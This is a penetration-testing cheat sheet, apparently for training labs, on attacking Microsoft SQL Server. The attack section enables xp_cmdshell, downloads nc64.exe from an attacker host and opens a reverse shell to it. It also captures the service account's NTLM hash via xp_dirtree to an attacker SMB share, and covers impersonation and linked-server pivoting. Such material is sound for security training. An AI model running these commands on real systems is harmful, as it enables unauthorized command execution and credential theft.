1433 msSQL
Enumeration
Basic enumeration:
If you don't know anything about the service:
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $ip
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $ip
We can also use Metasploit to run an auxiliary scanner called mssql_ping that will scan the MSSQL service and provide helpful information in our footprinting process.
MSSQL Ping in Metasploit
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.129.201.248
rhosts => 10.129.201.248
msf6 auxiliary(scanner/mssql/mssql_ping) > run
[*] 10.129.201.248: - SQL Server information for 10.129.201.248:
[+] 10.129.201.248: - ServerName = SQL-01
[+] 10.129.201.248: - InstanceName = MSSQLSERVER
[+] 10.129.201.248: - IsClustered = No
[+] 10.129.201.248: - Version = 15.0.2000.5
[+] 10.129.201.248: - tcp = 1433
[+] 10.129.201.248: - np = \\SQL-01\pipe\sql\query
[*] 10.129.201.248: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Connecting with Mssqlclient.py
If we can guess or gain access to credentials, this allows us to remotely connect to the MSSQL server and start interacting with databases using T-SQL (Transact-SQL). Authenticating with MSSQL will enable us to interact directly with databases through the SQL Database Engine. From Pwnbox or a personal attack host, we can use Impacket's mssqlclient.py to connect as seen in the output below. Once connected to the server, it may be good to get a lay of the land and list the databases present on the system.
python3 mssqlclient.py Administrator@$ip -windows-auth
# With python3 mssqlclient.py help you can see more options.
Basic mssql commands
# Get Microsoft SQL server version
select @@version;
# Get usernames
select user_name()
go
# Get databases
SELECT name FROM master.dbo.sysdatabases
go
# Get current database
SELECT DB_NAME()
go
# Get a list of users in the domain
SELECT name FROM master..syslogins
go
# Get a list of users that are sysadmins
SELECT name FROM master..syslogins WHERE sysadmin = 1
go
# And to make sure:
SELECT is_srvrolemember(‘sysadmin’)
go
# If your user is admin, it will return 1.
# Read Local Files in MSSQL
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
go
Attacks
Executing cmd shell in a SQL command line
Our goal can be to spawn a Windows command shell and pass in a string for execution. For that Microsoft SQL syntaxis has the command xp_cmdshell, that will allow us to use the SQL command line as a CLI.
Because malicious users sometimes attempt to elevate their privileges by using xp_cmdshell, xp_cmdshell is disabled by default. xp_cmdshell can be enabled and disabled by using the Policy-Based Management or by executing sp_configure
sp_configure displays or changes global configuration settings for the current settings. This is how you may take advantage of it:
# To allow advanced options to be changed.
EXECUTE sp_configure 'show advanced options', 1
go
# To update the currently configured value for advanced options.
RECONFIGURE
go
# To enable the feature.
EXECUTE sp_configure 'xp_cmdshell', 1
go
# To update the currently configured value for this feature.
RECONFIGURE
go
Note: The Windows process spawned by
xp_cmdshellhas the same security rights as the SQL Server service account
Now we can use the msSQL terminal to execute commands:
# This will return the .exe files existing in the current directory
EXEC xp_cmdshell 'dir *.exe'
go
# To print a file
EXECUTE xp_cmdshell 'type c:\Users\sql_svc\Desktop\user.txt
go
# With this (and a "python3 -m http.server 80" from our kali serving a file) we can upload a file to the attacked machine, for instance a reverse shell like nc64.exe
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://IPfromOurKali/nc64.exe -outfile nc64.exe"
go
# We could also bind this cmd.exe through the nc to our listener. For that open a different tab in kali and do a "nc -lnvp 443". When launching the reverse shell, we'll get a powershell terminal in this tab by running:
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe IPfromOurKali 443";
# You could also upload winPEAS and run it from this powershell command line
There are other methods to get command execution, such as adding extended stored procedures, CLR Assemblies, SQL Server Agent Jobs, and external scripts.
Capture MSSQL Service Hash
We can steal the MSSQL service account hash using xp_subdirs or xp_dirtree undocumented stored procedures, which use the SMB protocol to retrieve a list of child directories under a specified parent directory from the file system.
When we use one of these stored procedures and point it to our SMB server, the directory listening functionality will force the server to authenticate and send the NTLMv2 hash of the service account that is running the SQL Server.
1. First, start Responder or smbserver from impacket.
2. Run:
# For XP_DIRTREE Hash Stealing
EXEC master..xp_dirtree '\\$KaliIP\share\'
# For XP_SUBDIRS Hash Stealing
EXEC master..xp_subdirs '\\$KaliIP\share\
If the service account has access to our server, we will obtain its hash. We can then attempt to crack the hash or relay it to another host.
3. XP_SUBDIRS Hash Stealing with Responder
4. XP_SUBDIRS Hash Stealing with impacket
Impersonate Existing Users with MSSQL
SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends:
Impersonating sysadmin
# Identify Users that We Can Impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
go
# Verify if our current user has the sysadmin role:
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
go
# value 0 indicates no sysadmin role, value 1 is sysadmin role
Impersonating sa user
It's recommended to run EXECUTE AS LOGIN within the master DB, because all users, by default, have access to that database.
To revert the operation and return to our previous user
Communicate with Other Databases with MSSQL
MSSQL has a configuration option called linked servers. Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.
If we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server.
srvname isremote
----------------------------------- --------
DESKTOP-MFERMN4\SQLEXPRESS 1
10.0.0.12\SQLEXPRESS 0
# isremote, where 1 means is a remote server, and 0 is a linked server.
# Identify the user used for the connection and its privileges:
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
go
# The [EXECUTE](https://docs.microsoft.com/en-us/sql/t-sql/language-elements/execute-transact-sql) statement can be used to send pass-through commands to linked servers. We add our command between parenthesis and specify the linked server between square brackets (`[ ]`).
If we need to use quotes in our query to the linked server, we need to use single double quotes to escape the single quote. To run multiples commands at once we can divide them up with a semi colon (;).
Sources and resources
- nc64.exe.
- Impacket: mssqlclient.py.
- Pentesmonkey Cheat sheet.
- book.hacktricks.xyz.
- winPEAS.